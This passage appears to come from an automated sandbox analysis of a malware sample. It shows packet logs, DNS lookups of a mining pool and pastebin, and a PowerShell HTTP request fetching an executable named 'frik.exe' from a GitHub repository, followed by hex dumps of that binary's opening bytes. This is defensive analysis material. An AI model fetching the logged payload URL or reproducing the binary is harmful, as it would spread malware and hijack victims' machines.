                                                                                                      Oct 8, 2024 14:02:27.939377069 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.939448118 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.939505100 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.939505100 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.939511061 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.939575911 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.939645052 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.939686060 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.939721107 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.939726114 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.939764023 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.939773083 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.978030920 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.978066921 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.978204966 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.978214025 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:27.978230953 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:27.978301048 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.023276091 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.023322105 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.023490906 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.023504019 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.023566008 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.023964882 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.023993015 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.024051905 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.024060965 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.024066925 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.024097919 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.024122000 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.024131060 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.024177074 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.024177074 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.025006056 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.025027037 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.025089025 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.025100946 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.025257111 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.025708914 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.025729895 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.025774002 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.025779009 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.025813103 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.025868893 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.026041031 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.026076078 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.026133060 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.026133060 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.026140928 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.026397943 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:28.026448011 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:28.026562929 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:44.790483952 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:44.790529013 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:44.790606976 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:44.791043997 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:44.791055918 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.453068972 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.454724073 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:45.454742908 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.456188917 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.456296921 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:45.457878113 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:45.458003044 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.663412094 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.663467884 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:45.768086910 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.777343988 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:45.777375937 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.777621031 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:45.790544033 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:45.790570974 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.910706997 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:02:46.337071896 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:46.338460922 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:46.338475943 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:46.340024948 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:46.340095043 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:46.342056990 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:46.342132092 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:46.342252016 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:46.342264891 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:46.384476900 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:51.337795019 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:51.337896109 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:51.338047028 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:51.338083982 CEST44349714104.20.4.235192.168.2.9
                                                                                                      Oct 8, 2024 14:02:51.338108063 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:02:51.338141918 CEST49714443192.168.2.9104.20.4.235
                                                                                                      Oct 8, 2024 14:03:01.115612984 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:03:01.259497881 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:03:06.127993107 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:03:06.259459972 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:03:28.171418905 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:03:28.306395054 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:03:50.133577108 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:03:50.314114094 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:03:59.678313971 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:03:59.723400116 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:03:59.999234915 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:04:00.118787050 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:04:01.110482931 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:04:01.306283951 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:04:11.998188019 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:04:12.118804932 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:04:14.814305067 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:04:14.915697098 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:04:36.164362907 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:04:36.321882963 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:04:58.391836882 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:04:58.529872894 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:05:21.033510923 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:05:21.118674040 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:05:41.991370916 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:05:42.118622065 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:06:03.985447884 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:06:04.118819952 CEST49713443192.168.2.995.179.241.203
                                                                                                      Oct 8, 2024 14:06:26.147094011 CEST4434971395.179.241.203192.168.2.9
                                                                                                      Oct 8, 2024 14:06:26.212316990 CEST49713443192.168.2.995.179.241.203
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 8, 2024 14:02:22.382484913 CEST5656253192.168.2.91.1.1.1
                                                                                                      Oct 8, 2024 14:02:22.389697075 CEST53565621.1.1.1192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.582901955 CEST6289653192.168.2.91.1.1.1
                                                                                                      Oct 8, 2024 14:02:23.590401888 CEST53628961.1.1.1192.168.2.9
                                                                                                      Oct 8, 2024 14:02:44.743380070 CEST6017453192.168.2.91.1.1.1
                                                                                                      Oct 8, 2024 14:02:44.787023067 CEST53601741.1.1.1192.168.2.9
                                                                                                      Oct 8, 2024 14:02:45.769243956 CEST5602653192.168.2.91.1.1.1
                                                                                                      Oct 8, 2024 14:02:45.776557922 CEST53560261.1.1.1192.168.2.9
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 8, 2024 14:02:22.382484913 CEST192.168.2.91.1.1.10x5f10Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:23.582901955 CEST192.168.2.91.1.1.10x92a4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:44.743380070 CEST192.168.2.91.1.1.10x8febStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:45.769243956 CEST192.168.2.91.1.1.10x141dStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 8, 2024 14:02:22.389697075 CEST1.1.1.1192.168.2.90x5f10No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:23.590401888 CEST1.1.1.1192.168.2.90x92a4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:23.590401888 CEST1.1.1.1192.168.2.90x92a4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:23.590401888 CEST1.1.1.1192.168.2.90x92a4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:23.590401888 CEST1.1.1.1192.168.2.90x92a4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:44.787023067 CEST1.1.1.1192.168.2.90x8febNo error (0)pool.hashvault.pro95.179.241.203A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:44.787023067 CEST1.1.1.1192.168.2.90x8febNo error (0)pool.hashvault.pro45.76.89.70A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:45.776557922 CEST1.1.1.1192.168.2.90x141dNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:45.776557922 CEST1.1.1.1192.168.2.90x141dNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 14:02:45.776557922 CEST1.1.1.1192.168.2.90x141dNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                      • github.com
                                                                                                      • raw.githubusercontent.com
                                                                                                      • pastebin.com
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.949706140.82.121.44434872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 12:02:23 UTC104OUTGET /fruktoozik/qnfr/raw/refs/heads/main/frik.exe HTTP/1.1
                                                                                                      Host: github.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-08 12:02:23 UTC555INHTTP/1.1 302 Found
                                                                                                      Server: GitHub.com
                                                                                                      Date: Tue, 08 Oct 2024 12:02:23 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                      Access-Control-Allow-Origin:
                                                                                                      Location: https://raw.githubusercontent.com/fruktoozik/qnfr/refs/heads/main/frik.exe
                                                                                                      Cache-Control: no-cache
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                      X-Frame-Options: deny
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 0
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      2024-10-08 12:02:23 UTC3390INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co
                                                                                                      2024-10-08 12:02:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.949707185.199.109.1334434872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 12:02:24 UTC115OUTGET /fruktoozik/qnfr/refs/heads/main/frik.exe HTTP/1.1
                                                                                                      Host: raw.githubusercontent.com
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-08 12:02:24 UTC903INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      Content-Length: 5288736
                                                                                                      Cache-Control: max-age=300
                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                      Content-Type: application/octet-stream
                                                                                                      ETag: "3001d187fa95921871c14fec1b19059125924583728a622c58c5afbf374e330d"
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-Frame-Options: deny
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      X-GitHub-Request-Id: AB65:39A63E:C33CE4:D01C39:67051F50
                                                                                                      Accept-Ranges: bytes
                                                                                                      Date: Tue, 08 Oct 2024 12:02:24 GMT
                                                                                                      Via: 1.1 varnish
                                                                                                      X-Served-By: cache-nyc-kteb1890090-NYC
                                                                                                      X-Cache: MISS
                                                                                                      X-Cache-Hits: 0
                                                                                                      X-Timer: S1728388944.117409,VS0,VE184
                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                      X-Fastly-Request-ID: 1af4e6de39312c215a201ed5fd8bbe717fc64933
                                                                                                      Expires: Tue, 08 Oct 2024 12:07:24 GMT
                                                                                                      Source-Age: 0
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 08 00 21 4f 01 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 9a 00 00 00 ec 4f 00 00 00 00 00 40 11 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 51 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd!Og"O@@Q`
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 41 56 56 57 53 48 83 ec 20 65 48 8b 04 25 30 00 00 00 48 8b 78 08 48 8b 35 c9 9e 00 00 31 c0 f0 48 0f b1 3e 0f 94 c3 74 2e 48 39 c7 74 29 4c 8b 35 69 c0 00 00 66 0f 1f 84 00 00 00 00 00 b9 e8 03 00 00 41 ff d6 31 c0 f0 48 0f b1 3e 0f 94 c3 74 05 48 39 c7 75 e7 48 8b 3d 90 9e 00 00 8b 07 83 f8 01 75 0c b9 1f 00 00 00 e8 4f 96 00 00 eb 27 83 3f 00 74 09 c6 05 a1 5e 50 00 01 eb 19 c7 07 01 00 00 00 48 8b 0d 7a 9e 00 00 48 8b 15 7b 9e 00 00 e8 46 96 00 00 8b 07 83 f8 01 75 19 48 8b 0d 50 9e 00 00 48 8b 15 51 9e 00 00 e8 2c 96 00 00 c7 07 02 00 00 00 84 db 74 05 31 c0 48 87 06 48 8b 05 e6 9d 00 00 48 8b 00 48 85 c0 74 10 31 c9 ba 02 00 00 00 45 31 c0 ff 15 c6 8d 50 00 e8 39 06 00 00 48 8d 0d c2 0b 00 00 ff 15 a4 bf 00 00 48 8b 0d e5 9d 00 00 48 89 01 48 8d 0d
                                                                                                      Data Ascii: AVVWSH eH%0HxH51H>t.H9t)L5ifA1H>tH9uH=uO'?t^PHzH{FuHPHQ,t1HHHHt1E1P9HHHH
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 83 ec 20 80 3d ba 59 50 00 00 74 08 48 83 c4 20 5b 5f 5e c3 c6 05 a9 59 50 00 01 48 8b 35 b2 99 00 00 8b 06 83 f8 ff 75 1f b8 ff ff ff ff 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 8d 48 02 ff c0 48 83 3c ce 00 75 f4 85 c0 74 25 89 c7 48 ff cf 48 89 fb 0f 1f 84 00 00 00 00 00 48 8b 44 fe 08 ff 15 dd 88 50 00 48 ff cb 85 ff 48 89 df 75 eb 48 8d 0d c4 fe ff ff 48 83 c4 20 5b 5f 5e e9 28 fc ff ff cc cc cc cc cc cc cc cc 31 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 56 57 48 83 ec 28 48 8b 05 63 99 00 00 83 38 02 74 06 c7 00 02 00 00 00 83 fa 01 74 3c 83 fa 02 75 41 48 8d 35 0f b7 00 00 48 8d 3d 08 b7 00 00 48 39 f7 75 14 eb 2c 66 0f 1f 84 00 00 00 00 00 48 83 c7 08 48 39 fe 74 1a 48 8b 07 48 85 c0 74 ef ff 15 51 88 50 00 eb e7 ba 01 00 00 00 e8 1d 09 00 00
                                                                                                      Data Ascii: =YPtH [_^YPH5ufffff.HH<ut%HHHDPHHuHH [_^(1VWH(Hc8tt<uAH5H=H9u,fHH9tHHtQP
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 00 4a 8d 0c fd 00 00 00 00 4c 8d 24 89 4e 89 74 20 20 42 c7 04 20 00 00 00 00 e8 8b 08 00 00 41 8b 4e 0c 48 01 c1 48 8b 05 75 54 50 00 4a 89 4c 20 18 48 8d 54 24 28 41 b8 30 00 00 00 ff 15 af b5 00 00 48 85 c0 0f 84 91 00 00 00 8b 44 24 4c 83 f8 07 7e 13 83 f8 08 74 51 83 f8 40 74 4c 3d 80 00 00 00 74 45 eb 10 41 b8 04 00 00 00 83 f8 02 74 0b 83 f8 04 74 33 41 b8 40 00 00 00 48 8b 4c 24 28 48 8b 05 18 54 50 00 4f 8d 14 bf 4e 8d 0c d0 4a 89 4c d0 08 48 8b 54 24 40 4a 89 54 d0 10 ff 15 43 b5 00 00 85 c0 74 52 ff 05 f9 53 50 00 48 89 f1 48 89 da 49 89 f8 e8 9b 8b 00 00 90 48 83 c4 58 5b 5f 5e 41 5c 41 5e 41 5f c3 48 8d 0d dc 95 00 00 48 89 f2 e8 3d 00 00 00 41 8b 56 08 48 8b 05 ba 53 50 00 4b 8d 0c bf 4c 8b 44 c8 18 48 8d 0d d9 95 00 00 e8 1d 00 00 00 ff 15
                                                                                                      Data Ascii: JL$Nt B ANHHuTPJL HT$(A0HD$L~tQ@tL=tEAtt3A@HL$(HTPONJLHT$@JTCtRSPHHIHX[_^A\A^A_HH=AVHSPKLDH
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 4f 50 00 01 00 00 00 e9 de 00 00 00 e8 d7 f6 ff ff e9 d4 00 00 00 83 3d 53 4f 50 00 00 0f 84 c7 00 00 00 48 8d 0d 4e 4f 50 00 ff 15 20 b0 00 00 48 8b 3d 69 4f 50 00 48 85 ff 0f 84 9d 00 00 00 48 8b 1d 39 b0 00 00 4c 8b 35 0a b0 00 00 eb 11 0f 1f 84 00 00 00 00 00 48 8b 7f 10 48 85 ff 74 7c 8b 0f ff d3 48 89 c6 41 ff d6 85 c0 75 e9 48 85 f6 74 e4 48 8b 47 08 48 89 f1 ff 15 ff 7d 50 00 eb d5 48 8d 0d ee 4e 50 00 ff 15 d8 af 00 00 8b 05 da 4e 50 00 83 f8 01 75 4f 48 8b 0d fe 4e 50 00 48 85 c9 74 12 90 48 8b 71 10 e8 77 87 00 00 48 89 f1 48 85 f6 75 ef 48 c7 05 dc 4e 50 00 00 00 00 00 c7 05 a2 4e 50 00 00 00 00 00 48 8d 0d a3 4e 50 00 ff 15 6d af 00 00 eb 0d 48 8d 0d 94 4e 50 00 ff 15 7e af 00 00 b8 01 00 00 00 48 83 c4 28 5b 5f 5e 41 5e c3 cc cc cc cc cc cc
                                                                                                      Data Ascii: OP=SOPHNOP H=iOPHH9L5HHt|HAuHtHGH}PHNPNPuOHNPHtHqwHHuHNPNPHNPmHNP~H([_^A^
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 98 00 00 00 b9 05 00 00 00 31 d2 45 31 c0 e8 60 ee ff ff 85 c0 0f 88 ef 00 00 00 48 8b 3c 25 40 00 00 00 80 3d 3b 4a 50 00 00 0f 84 0d 06 00 00 48 8d b4 24 38 01 00 00 80 3d 81 4b 50 00 00 74 5a 66 0f 6f 05 5d 4b 50 00 66 0f fd 05 25 8e 00 00 66 0f db 05 2d 8e 00 00 66 0f 7f 05 45 4b 50 00 f3 0f 7e 05 4d 4b 50 00 66 0f fd 05 25 8e 00 00 66 0f db 05 2d 8e 00 00 66 0f d6 05 35 4b 50 00 8b 05 37 4b 50 00 83 c0 2d 0f b6 c0 66 89 05 2a 4b 50 00 c6 05 25 4b 50 00 00 48 8d 15 04 4b 50 00 41 b8 0c 00 00 00 48 89 f9 e8 66 81 00 00 c7 84 24 30 01 00 00 30 00 00 00 66 0f ef c0 f3 0f 7f 06 c7 46 10 00 00 00 00 f3 0f 7f 46 18 48 8b 04 25 50 00 00 00 48 89 84 24 d8 00 00 00 48 c7 84 24 e0 00 00 00 00 00 00 00 48 8d 4c 24 58 4c 8d 84 24 30 01 00 00 4c 8d 8c 24 d8 00 00
                                                                                                      Data Ascii: 1E1`H<%@=;JPH$8=KPtZfo]KPf%f-fEKP~MKPf%f-f5KP7KP-f*KP%KPHKPAHf$00fFFH%PH$H$HL$XL$0L$
                                                                                                      2024-10-08 12:02:24 UTC1378INData Raw: 4c 89 64 24 40 8b 84 24 c8 03 00 00 89 44 24 38 0f 11 74 24 20 c7 44 24 30 00 00 00 00 41 b8 ff ff 1f 00 41 b9 ff ff 1f 00 e8 7a e8 ff ff 48 c7 c1 ff ff ff ff 48 8d 54 24 60 4c 8d 84 24 90 00 00 00 41 b9 00 80 00 00 e8 2e e8 ff ff 48 c7 c1 ff ff ff ff 48 89 da 49 89 f0 41 b9 00 80 00 00 e8 16 e8 ff ff 48 8b 4c 24 68 e8 a3 e7 ff ff 48 8b 4c 24 58 e8 99 e7 ff ff 0f 28 b4 24 40 03 00 00 48 81 c4 58 03 00 00 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 c6 05 d2 45 50 00 01 48 b8 9d 00 80 00 80 00 9d 00 48 89 05 b7 45 50 00 66 c7 05 b6 45 50 00 41 00 48 8d 0d b7 00 00 00 e8 62 e6 ff ff c6 05 3b 44 50 00 01 80 3d 9e 45 50 00 00 0f 85 5e fb ff ff e9 95 fb ff ff c6 05 7c 45 50 00 01 66 0f 6f 05 1a 88 00 00 66 0f 7f 05 52 45 50 00 48 b8 01 00 38 00 4b 00 38 00 48 89 05
                                                                                                      Data Ascii: Ld$@$D$8t$ D$0AAzHHT$`L$A.HHIAHL$hHL$X($@HX[]_^A\A]A^A_EPHHEPfEPAHb;DP=EP^|EPfofREPH8K8H
